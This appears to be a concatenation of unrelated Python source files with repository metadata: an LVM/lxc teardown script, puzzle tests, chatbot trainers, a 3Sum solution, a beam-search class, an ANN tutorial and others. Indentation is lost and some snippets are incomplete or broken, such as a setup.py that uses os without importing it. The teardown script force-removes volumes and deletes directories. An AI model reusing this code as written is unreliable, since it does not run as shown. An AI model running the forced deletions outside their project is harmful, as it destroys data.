print('No volumes to delete')
else:
for logical_volume in lvlist:
delete_command = 'lvremove --yes /dev/%s/%s' % (VOLUME_GROUP, logical_volume)
p = subprocess.run(shlex.split(delete_command), stdout=subprocess.PIPE)
else:
print('%d volumes deleted' % len(lvlist))
# delete associated lxc profiles
profile_list_command = 'lxc profile list'
p = subprocess.run(shlex.split(profile_list_command), stdout=subprocess.PIPE)
profiles = p.stdout.decode().split('\n')
to_delete = [x for x in profiles if x.startswith('swift-runway-')]
if to_delete:
for profile in to_delete:
delete_command = 'lxc profile delete %s' % profile
p = subprocess.run(shlex.split(delete_command))
print('%d profles deleted' % len(to_delete))
else:
print('No profles to delete')
# delete container working spaces
for dirname in os.listdir('guest_workspaces'):
if dirname == 'README':
continue
dirname = 'guest_workspaces/' + dirname
shutil.rmtree(dirname)
| [
"me@not.mn"
] | me@not.mn |
e6d2396b1679238553cf86553f1d2cbe848c4b65 | b8c4ef9ccab22717ab97ab2fb100614d962a5820 | /src/test/python/com/skalicky/python/interviewpuzzles/test_find_all_concatenated_words_in_dictionary.py | 31250fe2c29509af0bab7db00e4be68e00a269b3 | [] | no_license | Sandeep8447/interview_puzzles | 1d6c8e05f106c8d5c4c412a9f304cb118fcc90f4 | a3c1158fe70ed239f8548ace8d1443a431b644c8 | refs/heads/master | 2023-09-02T21:39:32.747747 | 2021-10-30T11:56:57 | 2021-10-30T11:56:57 | 422,867,683 | 0 | 0 | null | 2021-10-30T11:56:58 | 2021-10-30T11:55:17 | null | UTF-8 | Python | false | false | 1,397 | py | from unittest import TestCase
from src.main.python.com.skalicky.python.interviewpuzzles.find_all_concatenated_words_in_dictionary import Solution
class TestSolution(TestCase):
def test_find_all_concatenated_words_in_dictionary__when_input_contains_words_of_same_length__then_output_is_empty(
self):
self.assertSetEqual(set(), Solution.find_all_concatenated_words_in_dictionary({'cat', 'dog', 'eat'}))
def test_find_all_concatenated_words_in_dictionary__when_input_contains_multiple_concatenated_words_of_2_other_words__then_these_words_are_in_output(
self):
self.assertSetEqual({'techlead', 'catsdog'}, Solution.find_all_concatenated_words_in_dictionary(
{'tech', 'lead', 'techlead', 'cat', 'cats', 'dog', 'catsdog'}))
def test_find_all_concatenated_words_in_dictionary__when_input_contains_concatenated_word_of_3_other_words__then_this_word_is_in_output(
self):
self.assertSetEqual({'catsdog'}, Solution.find_all_concatenated_words_in_dictionary(
{'cat', 's', 'dog', 'catsdog'}))
def test_find_all_concatenated_words_in_dictionary__when_input_contains_word_concatenated_by_multiple_ways__then_this_word_is_in_output(
self):
self.assertSetEqual({'cats', 'catsdog'}, Solution.find_all_concatenated_words_in_dictionary(
{'cat', 'cats', 's', 'dog', 'catsdog'}))
| [
"skalicky.tomas@gmail.com"
] | skalicky.tomas@gmail.com |
58ff279f7975147898d053677c3a180603ba4691 | b46c205f1c1c9cb53632987869afd05f2997bad8 | /setup.py | 6f08483129f5fcfadc91af15b9545fb04c5bad1f | [] | no_license | mohitRohatgi/easy21 | 33e3dd1648fd07264f513a452adee25669ce87c2 | 95683027124ef05fa2f8e072b3450ef8f9972383 | refs/heads/master | 2021-04-12T07:48:46.776583 | 2017-06-19T15:39:13 | 2017-06-19T15:39:13 | 94,510,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 160 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 15 19:38:57 2017
@author: m0r00ds
"""
here = os.path.dirname(os.path.abspath(__file__)) | [
"mohit.rohatgi@walmart.com"
] | mohit.rohatgi@walmart.com |
e21bbef8a9afa0ae7bab88d6245d993fc2a30213 | 1608bb10acd691eed6927cd27b98f9d5d6f5fbeb | /nodes/trainers.py | 66059b1c90bc92ec85526f65b71768b561299bba | [] | no_license | FiveRAge/speech | 85591d6420205496f40bb6d6e8f4ea7584a459a8 | 22a34093bfe5483c11da55d30b50051eab4ce52c | refs/heads/master | 2020-04-05T03:36:46.816787 | 2018-11-07T09:35:04 | 2018-11-07T09:35:04 | 156,521,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,825 | py | # -*- coding: utf-8 -*-
import os
from threading import Thread, Semaphore
from chatterbot.conversation import Response
from chatterbot.trainers import ListTrainer
from openpyxl import load_workbook
class SpeechTrainer(ListTrainer):
def __init__(self, storage, **kwargs):
super().__init__(storage, **kwargs)
self.speech_storage = storage
self.text_to_speech = kwargs.get('text_to_speech')
self.offline = kwargs.get('offline', False)
self.threads_num = kwargs['threads_num']
def download_speeches(self, statements):
if self.offline:
self.logger.warning('specified offline mode for training')
return
assert self.speech_storage is not None, 'speech_storage is none'
self.logger.info('starting downloading {} speeches'.format(len(statements)))
semaphore = Semaphore(self.threads_num)
threads = []
def thread_runner(stat, file, storage, logger):
with semaphore:
logger.info('downloading {}'.format(file))
self.text_to_speech.save_to_file(stat, file)
storage.insert_speech_file(stat, file)
os.remove(file)
logger.info('{} done'.format(file))
for i, statement in enumerate(statements):
if self.speech_storage.is_statement_exists(statement):
self.logger.warning('statement {} already exists in speech storage'.format(statement))
continue
thread_runner_args = (statement, '{}_{}'.format(i, 'voice.wav'),
self.speech_storage,
self.logger)
thread = Thread(target=thread_runner, args=thread_runner_args)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
self.logger.info('speeches has been downloaded')
class DialogFileTrainer(SpeechTrainer):
def __init__(self, storage, **kwargs):
super().__init__(storage, **kwargs)
def train(self, filename):
statements = []
self.logger.info('beginning training')
with open(filename, 'r', encoding='utf-8') as f:
statements.extend(f.read().split('\n'))
if statements.count(''):
statements.remove('')
super().train(statements)
try:
self.download_speeches(statements)
except Exception as e:
self.logger.error('failed to load speeches')
raise e
self.logger.info('training complete')
class ExcelTrainer(SpeechTrainer):
def __init__(self, storage, **kwargs):
super().__init__(storage, **kwargs)
def train(self, filename):
self.logger.info('beginning training')
wb = load_workbook(filename, read_only=True)
ws = wb.active
statements = []
count = 0
for row in ws.rows:
if row[0].value is None:
continue
requests = [str(r).strip() for r in str(row[0].value).strip('; ').split(';')]
responses = [str(r).strip() for r in str(row[1].value).strip('; ').split(';')]
count += len(responses)
statements.extend(responses)
for request in requests:
for response in responses:
statement = self.get_or_create(response.strip())
statement.add_response(Response(text=request.strip()))
self.storage.update(statement)
self.logger.info('training complete {} statements'.format(count))
try:
self.download_speeches(statements)
except Exception as e:
self.logger.error('failed to load speeches')
print(e)
| [
"noreply@github.com"
] | noreply@github.com |
1fc8429f96e9d5bb07215d6eee4e8caf868fceb5 | 1e92bf05112d6dd00a71940e81265c06522f9280 | /3. Arrays/3Sum.py | 35707403f2b8d48a7f2a328066ebabce3c4810e9 | [] | no_license | bhasin85/Teachable | cd54c2b71c152bd679edef9475720309c247ff26 | d77a9ac0515942c0d7944d026dc974ab7036b71d | refs/heads/master | 2023-01-21T23:28:05.251596 | 2020-06-23T09:40:19 | 2020-06-23T09:40:19 | 258,916,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,153 | py | # i 0
# p1 0
# p2
# [-4,-1,-1, 0, 1, 2] 6
# [-2,0,1,1,2]
# [-2,]
class Solution:
def threeSum(self, nums: List[int]) -> List[List[int]]:
nums.sort()
#print("Sorted {}".format(str(nums)))
size = len(nums)
result = set()
for i in range(size):
target = nums[i]
p1 = 0
p2 = size - 1
#print("Iterating i:{}".format(str(i)))
while p1 < p2 and p1 != i and p2 != i:
#print("target:{} p1:{} p2:{}".format(target, nums[p1], nums[p2]))
if nums[p1]+nums[p2] == target*-1:
list_entry = [nums[p1], nums[p2], target]
list_entry.sort()
entry = tuple(list_entry)
result.add(entry)
#print("result: {}".format(result))
#break
p1 += 1
p2 -= 1
elif nums[p1]+nums[p2] > target*-1:
p2 -= 1
else:
p1 += 1
return list(result)
| [
"noreply@github.com"
] | noreply@github.com |
25f5f4bc546237c9a21c8f825aa2abee0b5e3640 | 9f2762e8cdb020715034ef73023d3fd82e544b91 | /PROJECTS/p002/PSEF_SCRIPTS/mult_cfg.py | f36b5c813f315e15146e18c4e045642d54fc82d5 | [
"Apache-2.0"
] | permissive | nihole/PSEFABRIC | ade9ecf305f5974dc48520576e7e75d522d00cf9 | 366461ab86f99665bf310425c6ce05a216343ec9 | refs/heads/master | 2020-04-04T21:36:53.427341 | 2019-05-30T22:52:13 | 2019-05-30T22:52:13 | 156,292,904 | 9 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,965 | py | ######################################
# #
# 5. #
# configuration encapsulator #
# layer #
# #
######################################
'''
Three purposes of this layer:
- some additional configuration manipulation, for example:
(additional modules may be used for this purposes)
- removing of duplicated lines
- restoring of correct order of commnads if necessary
- encapsulation or adaptation of the configuration files to protocols or tools are used at Layer 6 (telnet/ssh, neconf, ansible etc.)
- saving of configuration files (folder $PSEFABRIC/PSEF_CONF/EQ_CONF/)
'''
import versionfile as vrs
import os
import host_to_type
import re
import copy
import pa_cfg_correction
import aci_cfg_correction
PSEFABRIC = os.environ['PSEFABRIC']
def version_file(eq_addr_, conf_, ext_):
########## Description #######
'''
'''
############# BODY ############
path_ = '%s/PSEF_CONF/EQ_CONF/%s.%s' % (PSEFABRIC, eq_addr_, ext_)
if not os.path.isfile(path_):
open(path_, 'a')
if (vrs.VersionFile(path_)):
with open(path_, 'w') as f10:
f10.write(conf_)
f10.flush()
else:
print ("Versioning file failed")
def mult_cfg(cfg_):
########## Description #######
'''
'''
############# BODY ############
host_ = copy.deepcopy(host_to_type.host_to_type())
for eq_addr in cfg_:
if re.search('panorama', host_[eq_addr]):
config = pa_cfg_correction.pa_cli_correction(cfg_[eq_addr])
version_file(eq_addr, config,'txt')
elif re.search('aci', host_[eq_addr]):
config = aci_cfg_correction.aci_json_correction(cfg_[eq_addr])
version_file(eq_addr, config,'json')
del host_[eq_addr]
return "OK"
| [
"nihole"
] | nihole |
39206d2358730cbaaafc66c76aafc84382af746a | 6a62bd2c79536d7392fc49d0e8bda279aef512b2 | /conditionals/cond3.py | 67ff55bdd4dc20daeb2b3401764e18b9d6e70b05 | [] | no_license | codecachet/examples | 7df7257627ff831ec3cac19f1fabd03c2b66933d | 5bd697307144f38b03abd7ffa350f11b5e79f102 | refs/heads/master | 2020-04-13T13:17:24.074184 | 2019-04-28T22:08:20 | 2019-04-28T22:08:20 | 163,225,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | def loop1(max):
n = 0
x = 0
while n <= max:
x += n
n += 1
return x
def addthem():
max = 6
n = loop1(max)
print(f'result={n}')
addthem()
| [
"david@codecachet.org"
] | david@codecachet.org |
d2894ba6e632b91ec3412e5b44336eb0e03154d2 | fec261e7717769078dd0044b3ac19e509ff65afa | /python/sort/selection_sort.py | bb4e47579b4fa5b22a4eeda18c29a39cc587698f | [] | no_license | ne7ermore/playground | af94854c6da01b43b1e10ea891129a749ea9d807 | 072406e562e0d33c650ba01bf9ebfbe593f55d5c | refs/heads/master | 2021-06-02T13:19:34.110406 | 2020-05-28T10:49:12 | 2020-05-28T10:49:12 | 108,945,081 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 532 | py | def selection_sort(arr):
for i in range(len(arr)):
cor_index = i
for j in range(i, len(arr)):
if arr[j] < arr[cor_index]:
cor_index = j
arr[i], arr[cor_index] = arr[cor_index], arr[i]
return arr
if __name__ == "__main__":
arr = [10, 20, 5, 9, 3, 8, 12, 14, 90, 0, 60, 40, 23, 35, 95, 18]
assert len(selection_sort(arr)) == len(arr)
assert selection_sort(arr) == [0, 3, 5, 8, 9, 10, 12,
14, 18, 20, 23, 35, 40, 60, 90, 95]
| [
"422618856@qq.com"
] | 422618856@qq.com |
6f6e441bbde59763d7fe65221a6f86714e769020 | 2082cd57fa2325a508af5f10bd00e8eca059bc09 | /src/geometry/manifolds/translation_algebra.py | 67b1958cc3594e112a9cdeb471c3976addf27f7f | [] | no_license | efernandez/geometry | 98e5894a83acaa32eefb2187374d4c34801a5600 | ec7fa1308224f3d156c54495bc4b05ce47a41004 | refs/heads/master | 2021-01-18T16:51:13.964917 | 2014-11-04T14:03:59 | 2014-11-04T14:03:59 | 36,390,891 | 0 | 1 | null | 2015-05-27T19:35:14 | 2015-05-27T19:35:14 | null | UTF-8 | Python | false | false | 1,237 | py | from . import MatrixLieAlgebra
from .. import extract_pieces, combine_pieces
from contracts import contract
import numpy as np
class tran(MatrixLieAlgebra):
'''
lie algebra for translation
'''
@contract(n="1|2|3")
def __init__(self, n):
MatrixLieAlgebra.__init__(self, n + 1, dimension=n)
def norm(self, X):
W, v, zero, zero = extract_pieces(X) # @UnusedVariable
return np.linalg.norm(v)
def project(self, X):
W, v, zero, zero = extract_pieces(X) # @UnusedVariable
return combine_pieces(W * 0, v, v * 0, 0)
def __repr__(self):
return 'tr%s' % (self.n - 1)
def interesting_points(self):
points = []
points.append(self.zero())
return points
@contract(a='belongs')
def vector_from_algebra(self, a):
W, v, zero, zero = extract_pieces(a) # @UnusedVariable
if v.shape == ():
v = v.reshape(1)
assert v.size == self.n - 1
return v
@contract(returns='belongs', v='array[K]')
def algebra_from_vector(self, v):
assert v.size == self.n - 1
return combine_pieces(np.zeros((self.n - 1, self.n - 1)), v, v * 0, 0)
| [
"andrea@cds.caltech.edu"
] | andrea@cds.caltech.edu |
37879211d77b9b1040a5740a3343467cdd3d662d | c282727ef1ccb490beb62c4f56f4f2cbbb7b32c4 | /src/management_console/ListManagementConsole.py | d612c92520a4942f8348ab3a06e2a806b0afbb32 | [
"Apache-2.0"
] | permissive | kastellanos/HmcRestClient | 64f5baf52ac6dff3dd221d6b815f652e1278a723 | fa8a88a3cb7ecb6e241ff48b8c0dc3f99c3c38f3 | refs/heads/master | 2021-01-15T22:09:47.770432 | 2016-07-12T14:17:11 | 2016-07-12T14:17:11 | 62,428,157 | 0 | 0 | null | 2016-07-02T01:24:05 | 2016-07-02T01:24:04 | null | UTF-8 | Python | false | false | 3,317 | py | # Copyright 2015, 2016 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from src.utility import HTTPClient,HMCClientLogger,HmcHeaders
from src.common import ListModule
log_object=HMCClientLogger.HMCClientLogger(__name__)
CONTENT_TYPE = "application/vnd.ibm.powervm.uom+xml; type=ManagementConsole"
class ListManagementConsole(object):
""""
lists the details of Management Console
"""
def __init__(self):
"""
Initializes the log object to use Log module
"""
self.content_type = CONTENT_TYPE
def list_ManagementConsole(self, ip, session_id):
"""
collects the xml content of the management console and
returns a reference to it
Args:
ip : ip address of HMC
session_id : session to be used
"""
log_object.log_debug("List of ManagementConsole started")
listing_object = ListModule.ListModule()
#call to get the xml content of managed system #
object_list = listing_object.listing("uom",ip, "ManagementConsole", self.content_type, "ManagementConsole", session_id)
log_object.log_debug("Returns ManagementConsole"
" objects to the main module")
return object_list
def print_managementconsole_attributes(self, managementconsole_object):
"""
Prints the quick property values from the retrieved xml content
Args:
object_list:represents user selected choice of specific
management console
"""
print("\n")
print("ManagementConsoleName".ljust(35), ":",
managementconsole_object.ManagementConsoleName.value())
print("BaseVersion".ljust(35), ":", managementconsole_object.BaseVersion.value())
print("Management Console id".ljust(35), ":",
managementconsole_object.Metadata.Atom.AtomID.value())
#print("\nNETWORK INTERFACES\n")
try:
for entry in range(0, len(managementconsole_object.NetworkInterfaces.\
ManagementConsoleNetworkInterface)):
print ("MANAGEMENT CONSOLE NETWORK INTERFACE".ljust(35), ":", entry)
print ("InterfaceName".ljust(35), ":",managementconsole_object.\
NetworkInterfaces.ManagementConsoleNetworkInterface[entry].\
InterfaceName.value())
print ("NetworkAddress".ljust(35), ":", managementconsole_object.\
NetworkInterfaces.ManagementConsoleNetworkInterface[entry].\
NetworkAddress.value())
except Exception:
pass
| [
"niraj.shah@in.ibm.com"
] | niraj.shah@in.ibm.com |
be9add49d0aeacb6d7afb2c253e3af21d0d744e8 | 4b0abab9cccec5789c9f5453c542a8567d448459 | /main.py | aac3ce2162ca9a2cc9cd57d8746ab8afb35878fe | [] | no_license | aastha2008/Aastha-test-1 | 9a88f801b220704b837f945af8038e6a24b9a05a | 28b4601ae016122f7bafbe564294ab11094b2fc9 | refs/heads/master | 2023-02-22T14:05:30.394348 | 2021-01-14T23:47:35 | 2021-01-14T23:47:35 | 329,761,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | print("hello world")
x=20
y=5
m=x+y
print(m)
| [
"109658@eesd.org"
] | 109658@eesd.org |
39437032dd7ce969ba97304c78120010116c1c0e | 6addd46151c72418179601f8a2acae82df698e1b | /lib/Pool.py | 923e947c213202af48897e10f02261a169f8be22 | [] | no_license | chocciibuster/Polaroid_Chatbot | ce783d995a7dd991079a3b4f50acd77e2d8b08d7 | c30d390d5a5670974c92ae516678f2a14939dd8f | refs/heads/main | 2023-05-05T09:55:19.244745 | 2021-05-21T15:19:03 | 2021-05-21T15:19:03 | 369,216,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | from Member import Member
class Pool:
def __init__(self, members):
self.members = members
self.goal = 100000 * len(members)
self.balance = 0
self.status = 0
def addMembers(self, members):
pass
def removeMembers(self, members):
pass
| [
"75527948+chocciibuster@users.noreply.github.com"
] | 75527948+chocciibuster@users.noreply.github.com |
a26cff623a0c12894aafb69e2e6e8b6698bf3b5d | fa22e83863d60858e2386c2ae0923d065886000a | /src/layers/beam_search.py | 4809e633b60c4e2909d7b6a6b3a859896bad75ac | [
"MIT"
] | permissive | NoSyu/VHUCM | aa96e9b4720425973888a743c3d2154feec4a234 | 3fab78f1b0cced8d9b2a2d5b6f3d6f1021ce9a93 | refs/heads/master | 2023-06-10T00:50:32.803670 | 2021-07-02T00:55:55 | 2021-07-02T00:55:55 | 203,309,770 | 9 | 0 | MIT | 2020-02-02T08:20:22 | 2019-08-20T06:02:07 | Python | UTF-8 | Python | false | false | 3,140 | py | import torch
from utils import EOS_ID
class Beam(object):
def __init__(self, batch_size, hidden_size, vocab_size, beam_size, max_unroll, batch_position):
"""Beam class for beam search"""
self.batch_size = batch_size
self.hidden_size = hidden_size
self.vocab_size = vocab_size
self.beam_size = beam_size
self.max_unroll = max_unroll
self.batch_position = batch_position
self.log_probs = list()
self.scores = list()
self.back_pointers = list()
self.token_ids = list()
self.metadata = {'inputs': None, 'output': None, 'scores': None, 'length': None, 'sequence': None}
def update(self, score, back_pointer, token_id):
self.scores.append(score)
self.back_pointers.append(back_pointer)
self.token_ids.append(token_id)
def backtrack(self):
prediction = list()
length = [[self.max_unroll] * self.beam_size for _ in range(self.batch_size)]
top_k_score, top_k_idx = self.scores[-1].topk(self.beam_size, dim=1)
top_k_score = top_k_score.clone()
n_eos_in_batch = [0] * self.batch_size
back_pointer = (top_k_idx + self.batch_position.unsqueeze(1)).view(-1)
for t in reversed(range(self.max_unroll)):
token_id = self.token_ids[t].index_select(0, back_pointer)
back_pointer = self.back_pointers[t].index_select(0, back_pointer)
eos_indices = self.token_ids[t].data.eq(EOS_ID).nonzero()
if eos_indices.dim() > 0:
for i in range(eos_indices.size(0) - 1, -1, -1):
eos_idx = eos_indices[i, 0].item()
batch_idx = eos_idx // self.beam_size
batch_start_idx = batch_idx * self.beam_size
_n_eos_in_batch = n_eos_in_batch[batch_idx] % self.beam_size
beam_idx_to_be_replaced = self.beam_size - _n_eos_in_batch - 1
idx_to_be_replaced = batch_start_idx + beam_idx_to_be_replaced
back_pointer[idx_to_be_replaced] = self.back_pointers[t][eos_idx].item()
token_id[idx_to_be_replaced] = self.token_ids[t][eos_idx].item()
top_k_score[batch_idx,
beam_idx_to_be_replaced] = self.scores[t].view(-1)[eos_idx].item()
length[batch_idx][beam_idx_to_be_replaced] = t + 1
n_eos_in_batch[batch_idx] += 1
prediction.append(token_id)
top_k_score, top_k_idx = top_k_score.topk(self.beam_size, dim=1)
final_score = top_k_score.data
for batch_idx in range(self.batch_size):
length[batch_idx] = [length[batch_idx][beam_idx.item()]
for beam_idx in top_k_idx[batch_idx]]
top_k_idx = (top_k_idx + self.batch_position.unsqueeze(1)).view(-1)
prediction = [step.index_select(0, top_k_idx).view(
self.batch_size, self.beam_size) for step in reversed(prediction)]
prediction = torch.stack(prediction, 2)
return prediction, final_score, length
| [
"dongdm@gmail.com"
] | dongdm@gmail.com |
ef617912f64bce4020083b3e65bcb5438a6b7fb4 | 345c6cf82eb242ef7b863af8eecd459f85c89940 | /test_19_mvsemicolon.py | fd4e4015c392bc29277176fd59d54a3c2c459c85 | [] | no_license | 718970079816800/PythonStudy | 9fe0e4644c9724ced69f732c953702b893d83baf | 320eaca1ffe4dd1139aef41b4ec278ef395b3649 | refs/heads/master | 2021-07-16T21:57:40.055244 | 2020-05-09T12:14:59 | 2020-05-09T12:14:59 | 148,250,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 366 | py | import os
import os.path
import shutil
pathDir = 'F:\\Data\\OtherTxt\\'
os.chdir(pathDir)
files = os.listdir(pathDir)
for f in files:
print f
with open(f, 'r') as g:
firstline = g.readline()
if len(firstline.split(';')) == 2:
pass
else:
shutil.copy(f, 'F:\\Data\\UserPassTxt\\movesemicolon\\')
| [
"noreply@github.com"
] | noreply@github.com |
3a36a2d2375d06055ac1d8512208165b78fe37aa | 3e52ad548b7138b3d83310a5375cc8a3c5886580 | /AI-ML/Supervised/ANN/Classification/artificial_neural_network.py | af13fae9193126525f062251d9509be5d3717d28 | [] | no_license | alexal9/AI-ML | 8ccdd05daac9c465ad7c2cdf35939d33266cdd1e | ce43619702ac6af95378eaaafb555405aba9452f | refs/heads/master | 2022-11-23T02:35:44.335615 | 2020-07-28T08:39:57 | 2020-07-28T08:39:57 | 283,151,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,057 | py | # Artificial Neural Network
# Importing the libraries
import numpy as np
import pandas as pd
import tensorflow as tf
print(tf.__version__)
# Part 1 - Data Preprocessing
# Importing the dataset
dataset = pd.read_csv('Churn_Modelling.csv')
X = dataset.iloc[:, 3:-1].values
y = dataset.iloc[:, -1].values
print(X)
print(y)
# Encoding categorical data
# Label Encoding the "Gender" column
## basically the same as one hot encoding and dropping a column
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
X[:, 2] = le.fit_transform(X[:, 2])
print(X)
# One Hot Encoding the "Geography" column
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder
ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [1])], remainder='passthrough')
# X = np.array(ct.fit_transform(X))
# drop first column of dummy variables to address multicollinearity
X = np.array(ct.fit_transform(X))[:, 1:]
print(X)
## alternatively, we can manipulate the dataframe with
## dataset_with_dummies = pd.get_dummies(dataset, drop_first=True)
## to perform one hot encoding while removing the first dummy variable
## and then extract X,y with iloc[].values
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Part 2 - Building the ANN
# Initializing the ANN
ann = tf.keras.models.Sequential()
# Adding the input layer and the first hidden layer
ann.add(tf.keras.layers.Dense(units=6, activation='relu'))
# Adding the second hidden layer
ann.add(tf.keras.layers.Dense(units=6, activation='relu'))
# Adding the output layer
ann.add(tf.keras.layers.Dense(units=1, activation='sigmoid'))
# Part 3 - Training the ANN
# Compiling the ANN
ann.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Training the ANN on the Training set
ann.fit(X_train, y_train, batch_size = 32, epochs = 100)
# Part 4 - Making the predictions and evaluating the model
# Predicting the result of a single observation
"""
Homework:
Use our ANN model to predict if the customer with the following informations will leave the bank:
Geography: France
Credit Score: 600
Gender: Male
Age: 40 years old
Tenure: 3 years
Balance: $ 60000
Number of Products: 2
Does this customer have a credit card? Yes
Is this customer an Active Member: Yes
Estimated Salary: $ 50000
So, should we say goodbye to that customer?
Solution:
"""
# print(ann.predict(sc.transform([[1, 0, 0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]])) > 0.5)
print(ann.predict(sc.transform([[0, 0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]])) > 0.5)
"""
Therefore, our ANN model predicts that this customer stays in the bank!
Important note 1: Notice that the values of the features were all input in a double pair of square brackets. That's because the "predict" method always expects a 2D array as the format of its inputs. And putting our values into a double pair of square brackets makes the input exactly a 2D array.
Important note 2: Notice also that the "France" country was not input as a string in the last column but as "1, 0, 0" in the first three columns. That's because of course the predict method expects the one-hot-encoded values of the state, and as we see in the first row of the matrix of features X, "France" was encoded as "1, 0, 0". And be careful to include these values in the first three columns, because the dummy variables are always created in the first columns.
"""
# Predicting the Test set results
y_pred = ann.predict(X_test)
y_pred = (y_pred > 0.5)
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix, accuracy_score
cm = confusion_matrix(y_test, y_pred)
print(cm)
accuracy_score(y_test, y_pred) | [
"noreply@github.com"
] | noreply@github.com |
006d5216c55a276b30c61478f4da189fc81ca037 | 7bf287e00b35f50afa70e8585f41d1db543d98f2 | /Medium/FindLeavesOfBinaryTree.py | c914ab48ab422fd2ee73e77c175d3f5a5d0fe9c8 | [] | no_license | mangalagb/Leetcode | eac611453de07ffc635265e98c39b46255cf76c6 | fcf6c3d5d60d13706950247d8a2327adc5faf17e | refs/heads/master | 2022-05-14T23:16:28.007044 | 2022-04-29T19:33:24 | 2022-04-29T19:33:24 | 158,616,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,011 | py | # #Given the root of a binary tree, collect a tree's nodes as if you were doing this:
#
# Collect all the leaf nodes.
# Remove all the leaf nodes.
# Repeat until the tree is empty.
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution(object):
def findLeaves(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
ans = []
while root is not None:
leaves = []
self.remove_leaves(root, None, None, leaves)
#it is a root node
if len(leaves) == 0:
leaves.append(root.val)
root = None
ans.append(leaves)
return ans
def remove_leaves(self, node, parent, isLeftChild, leaves):
if not node:
return
#If node is a leaf
if not node.left and not node.right:
if isLeftChild is None:
return
if isLeftChild:
parent.left = None
else:
parent.right = None
leaves.append(node.val)
if node.left:
self.remove_leaves(node.left, node, True, leaves)
if node.right:
self.remove_leaves(node.right, node, False, leaves)
def make_tree(self):
root = TreeNode(1)
node2 = TreeNode(2)
node3 = TreeNode(3)
node4 = TreeNode(4)
node5 = TreeNode(5)
root.left = node2
root.right = node3
node2.left = node4
node2.right = node5
return root
def make_tree1(self):
root = TreeNode(1)
return root
my_sol = Solution()
root = my_sol.make_tree()
print(my_sol.findLeaves(root)) #[[4,5,3],[2],[1]]
root = my_sol.make_tree1()
print(my_sol.findLeaves(root)) #[[1]]
| [
"mangalagb@gmail.com"
] | mangalagb@gmail.com |
137dfeec2dbbe9c5d924c0adec0e07bf2eac64d4 | 77aa89620bb2773100082e268f07fa0b8b80b4f1 | /scripts/get_previews.py | 458874472e92114f471550b6cf65d66d9d28e396 | [] | no_license | d-alvear/Analyzing-Music-by-Decade | 40f771f9bdd6a7c8119966530fb0f444eae47828 | adc5b1e5c2bb288700de0abdc72ffe636e71876a | refs/heads/main | 2023-01-20T23:27:53.577018 | 2020-12-03T18:13:04 | 2020-12-03T18:13:04 | 308,172,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | import pandas as pd
import numpy as np
import requests
from IPython.display import clear_output
def get_mp3(track_id, url):
'''A function that takes an mp3 url, and writes it to the local
directory "/tmp"'''
doc = requests.get(url)
with open(f'C:/Users/deand/Documents/Repositories/Music-Analysis/data/previews/track_{track_id}.wav', 'wb') as f:
f.write(doc.content)
songs = pd.read_csv("C:/Users/deand/Documents/Repositories/Music-Analysis/data/all_decades_songs_V3.csv", index_col=0)
err = {}
for i, row in songs.iterrows():
try:
get_mp3(row['track_id'], row['preview_url'])
except:
err[row['track_id']] = row['preview_url']
clear_output(wait=True)
print(f"{i+1}/{len(songs)}")
print(err)
| [
"deandraalvear@gmail.com"
] | deandraalvear@gmail.com |
fc4843dbe74e0b7bedb04ad7a110695dcc7c14bd | 9e08a89c02e737f8371b6d0c16bc8c64484fd07f | /assignments/assignment11/definitions.py | fee7455dda5e352a6ac670b5aac1aae50145f674 | [] | no_license | gatlinL/csce204 | c0ecab2c8efd25dc428d591aaeb43ca5c0f589cd | f86959b09a67c20eac1a96b5737929fc491f83fe | refs/heads/main | 2023-04-20T19:36:31.183034 | 2021-05-05T03:25:52 | 2021-05-05T03:25:52 | 329,712,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,033 | py | # Author: Gatlin Lawson
def getDictionary():
dictionary = {}
with open("assignments/assignment11/words.txt") as file:
for line in file:
data = line.split(':')
word = data[0].strip()
wordDef = data[1].strip()
dictionary[word] = wordDef
return dictionary
def getDefinition():
wordChoice = input("Enter Word: ").lower()
if wordChoice in wordDef:
print(f"{wordChoice}: {wordDef[wordChoice]}")
else:
print(f"Sorry, {wordChoice} is not in our system")
def displayDictionary():
for word in wordDef:
print(f"{word}: {wordDef[word]}")
print("Welcome to our dictionary")
wordDef = getDictionary()
while True:
answer = input("Would you like to (V)iew, (D)efine, or (Q)uit: ").lower()
